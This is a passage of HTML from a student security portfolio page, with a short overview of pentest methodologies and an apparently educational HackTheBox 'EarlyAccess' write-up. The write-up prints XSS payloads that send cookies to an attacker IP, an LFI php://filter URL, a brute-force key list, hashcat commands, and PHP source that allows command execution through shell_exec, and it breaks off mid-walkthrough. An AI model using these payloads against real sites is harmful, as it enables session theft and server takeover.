          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
